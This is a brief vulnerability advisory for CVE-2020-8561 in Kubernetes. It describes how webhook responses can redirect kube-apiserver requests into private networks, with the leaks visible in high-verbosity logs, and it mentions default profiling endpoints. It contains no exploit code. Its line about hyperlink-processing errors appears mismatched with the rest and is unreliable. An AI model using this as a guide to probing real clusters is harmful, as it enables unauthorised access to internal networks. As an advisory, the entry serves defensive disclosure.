CVE-2020-8561

Name of the Vulnerable Software and Affected Versions Kubernetes (affected versions not specified)

Description A security issue was discovered in Kubernetes where actors that control the responses of MutatingWebhookConfiguration or ValidatingWebhookConfiguration requests are able to redirect kube-apiserver requests to private networks of the apiserver. If that user can view kube-apiserver logs when the log level is set to 10, they can view the redirected responses and headers in the logs. The issue is related to errors in processing hyperlinks, which can allow a remote attacker to access confidential data. Additionally, the kube-apiserver, scheduler, controller-manager, and kubelet have profiling enabled by default, and access to this information can be obtained by accessing the /debug/pprof/profile endpoint, although necessary RBAC rights are required for kube-apiserver, kube-controller-manager, and kube-scheduler.

Recommendations At the moment, there is no information about a newer version that contains a fix for this vulnerability.